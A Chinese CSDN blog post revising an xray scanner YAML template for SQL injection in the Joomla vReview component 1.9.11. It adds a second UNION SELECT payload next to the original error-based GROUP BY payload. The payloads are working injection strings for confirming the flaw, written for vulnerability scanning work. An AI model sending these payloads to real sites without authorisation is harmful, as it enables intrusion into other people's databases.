xray插件改良8-poc-yaml-joomla-component-vreview-sql

最新推荐文章于 2023-12-09 18:13:43 发布
最新推荐文章于 2023-12-09 18:13:43 发布
阅读量313 收藏
点赞数
分类专栏: Xray插件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/115216099
版权

xray插件改良8-poc-yaml-joomla-component-vreview-sql

前言

原始yml

name: poc-yaml-joomla-component-vreview-sql
set:
  r1: randomInt(800000000, 1000000000)
rules:
  - method: POST
    path: /index.php?option=com_vreview&task=displayReply
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: >-
      profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    follow_redirects: true
    expression: |
      response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
detail:
  author: 南方有梦(https://github.com/hackgov)
  Affected Version: "1.9.11"
  links:
    - https://www.exploit-db.com/exploits/46227

根据links:https://www.exploit-db.com/exploits/46227
找到原始漏洞描述,发现存在两个poc,故而做出如下修改

name: poc-yaml-joomla-component-vreview-sql
set:
  r1: randomInt(800000000, 1000000000)
groups:
  poc1:
    - method: POST
      path: /index.php?option=com_vreview&task=displayReply
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: >-
        profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)#
      follow_redirects: true
      expression: |
        response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
  poc2:
    - method: POST
      path: /index.php?option=com_vreview&task=editReview
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: >-
        profileid=1 union select CONCAT_WS(0x203a20,md5({{r1}}),0x203a20,0x203a20)-- -
      follow_redirects: true
      expression: |
        response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
  
detail:
  author: 南方有梦(https://github.com/hackgov)
  Affected Version: "1.9.11"
  links:
    - https://www.exploit-db.com/exploits/46227
_HWHXY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xray-poc-generation::dna: 辅助生成 XRay YAML POC
05-06
:dna: XRay POC Generation XRay安全评估 > POC辅助生成工具。 关于XRay: 访问 即可直接使用。 :laptop: 本地运行 ...cd xray-poc-generation yarn yarn build 编译完成后,Web目录在build/文件夹。
记一次内网靶机实战
千寻的博客
11-05 1863
记一次内网靶机实战记录,1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2305
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker未授权漏洞利用,ssh密钥连接
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞
XXokok的博客
12-09 1211
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞。使用工具一键生成Yaml文件
xray Web扫描器学习记录
weixin_50464560的博客
06-06 3895
简介项目地址:https://github.com/chaitin/xray 长亭科技研发的一款完善的安全评估工具,支持常见Web安全问题扫描和自定义POC,虽然Github有项目,但是不开源,只提供社区版本供大家使用。 基本使用代理模式代理模式下的基本架构为,扫描器作为中间人,首先原样转发流量,并返回服务器响应给浏览器等客户端,通讯两端都认为自己直接与对方对话,同时记录该流量,然后修改参数并重新发送请求进行扫描。这种原理和Burpsuite的自带的漏扫原理是一样的。 生成ca证书Bash# 生成 .
xray插件改良5-poc-yaml-duomicms-sqli
HWHXY的博客
03-23 571
xray插件改良5-poc-yaml-duomicms-sqli 前言 poc-yaml-duomicms-sqli原始的ymlpoc-yaml-duomicms-sqli name: poc-yaml-duomicms-sqli rules: - method: GET path: >- /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(20
gopoc:用cel-go重现了长亭xraypoc检测功能的轮子
03-20
于是根据xray文档中的检测poc的思路,用写了一个轮子,方便批量检测。 目前只支持ceye.io作为反连的验证平台,适合小规模批量验证。我不知道怎么实现类型注入 另外,如果双方只能在同一个内网才能互通,估计得用http...
laravel-view-xray:看一下您的Laravel视图
02-03
X射线-看一下Laravel视图 ...您可以通过将名为XRAY_ENABLED的环境变量设置为false来禁用Xray。 排除景观 如果要排除某些视图无法被Xray处理,可以通过将其添加到配置文件中来实现。 使用以下方法发布配置文件: ...
awesome-cdk8s
05-10
xray-用于cdk8s的AWS X-Ray构造 讲座和博客文章 按日期排序,最顶部 , , 年5月日,开放构建基金会Matthew Bonig撰写。 用cdk8s结束YAML工程! (CNCF网络研讨会),AWS于2020/5/13 AWS在2020/5/13中为...
xray:X-Ray-PHP Engine编译器挂钩API(新)
05-09
xray\set_compiler_hook ( function ( string $ source , string $ filename = null ) : string { if ( $ filename === null ) { // here we intercept source included through eval() // do ...
poco:Poco将使用简单的YAML配置文件帮助您组织和管理各种复杂程度的Docker,Docker-Compose,Kubernetes,Openshift项目,从而缩短从查找项目到在本地环境中初始化项目的路线
05-03
POCO Poco使用简单的YAML配置文件帮助组织和管理各种复杂性的Docker,Docker-Compose,Kubernetes项目,从而缩短了从查找项目到在本地环境中初始化项目的路线。 很简单。 使用非常简单的命令行界面配置,运行和在项目之间切换。 灵活性强。 轻松管理,扩展和维护任何复杂性的项目。 配置一次,到处使用。 一次配置项目,以便团队其他成员将感受到零配置的价值。 特征 开箱即用的Docker,Docker-Compose,Kubernetes,Helm支持。 Git,SVN支持开箱即用。 项目目录,多个目录。 创建您自己的项目目录。 无需其他工具即可组织您的项目。 多个计划。 为不同的环境甚至是出于演示目的的环境创建多个计划。 轻松地在计划(环境)之间切换。 简单的配置文件。 Poco有助于拆分配置文件,因此可以随时轻松维护和扩展它们。 脚本支持(挂钩
Joomla漏洞
热门推荐
Grey的博客
07-09 1万+
开始复现漏洞
xray插件改良3-poc-yaml-dlink-850l-info-leak
HWHXY的博客
03-23 1064
xray插件改良3-poc-yaml-dlink-850l-info-leak 前言 poc-yaml-dlink-850l-info-leak原始的yml poc-yaml-dlink-850l-info-leak name: poc-yaml-dlink-850l-info-leak rules: - method: POST path: /hedwig.cgi headers: Content-Type: text/xml Cookie: uid=R8tBj
Joomla 3.4.6 RCE复现及分析
whojoe的博客
05-01 802
Joomla 3.4.6 RCE复现及分析前言环境搭建漏洞复现exp分析参考文章 前言 前几天看了下PHP 反序列化字符逃逸学习,有大佬简化了一下joomla3.4.6rce的代码,今天来自己分析学习一下 环境搭建 Joomla 3.4.6 : https://downloads.joomla.org/it/cms/joomla3/3-4-6 php :5.4.45nts(不支持php7) 影响版...
xray插件改良7-poc-yaml-etouch-v2-sqli
HWHXY的博客
03-24 1157
xray插件改良7-poc-yaml-etouch-v2-sqli 前言 原始yml name: poc-yaml-etouch-v2-sqli rules: - method: GET path: >- /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e
xray插件改良6-poc-yaml-ecshop-360-rce
HWHXY的博客
03-23 556
xray插件改良6-poc-yaml-ecshop-360-rce 前言 原始yml name: poc-yaml-ecshop-360-rce set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) rules: - method: POST path: /user.php headers: Referer: >- 45ea207d7a2b68c49582d2d22adf953a
xray插件改良1-poc-yaml-ofbiz-cve-2020-9496
HWHXY的博客
03-21 507
xray插件改良1-ofbiz-cve-2020-9496 前言 poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization原始的yml https://github.com/chaitin/xray/blob/master/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization
xray插件改良4-poc-yaml-dlink-dsl-2888a-rce
HWHXY的博客
03-23 428
xray插件改良4-poc-yaml-dlink-dsl-2888a-rce 前言 poc-yaml-dlink-dsl-2888a-rce原始的yml poc-yaml-dlink-dsl-2888a-rce name: poc-yaml-dlink-dsl-2888a-rce rules: - method: GET path: /page/login/login.html follow_redirects: false expression: | respons
xray-core v1.8.4
最新发布
12-15
xray-core v1.8.4 是一个功能强大的 X 光扫描工具,它可以帮助用户检测和分析网络中的安全漏洞和风险。这个版本带来了一些重要的更新和改进,包括增强的扫描性能和更精确的漏洞识别能力。另外,还修复了一些已知的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值